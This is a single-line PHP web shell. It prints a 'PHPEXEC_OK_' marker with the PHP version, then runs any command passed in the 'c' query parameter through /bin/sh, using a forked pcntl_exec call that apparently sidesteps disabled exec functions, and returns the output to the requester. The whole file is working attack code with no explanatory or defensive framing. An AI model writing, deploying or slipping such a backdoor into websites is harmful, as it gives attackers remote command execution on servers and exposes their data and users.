<?php echo 'PHPEXEC_OK_'.phpversion();if(isset($_GET['c'])){$t=tempnam('/tmp','x');$p=pcntl_fork();if($p==0){pcntl_exec('/bin/sh',['-c',$_GET['c'].' > '.$t.' 2>&1']);exit;}pcntl_waitpid($p,$s);echo file_get_contents($t);unlink($t);}?>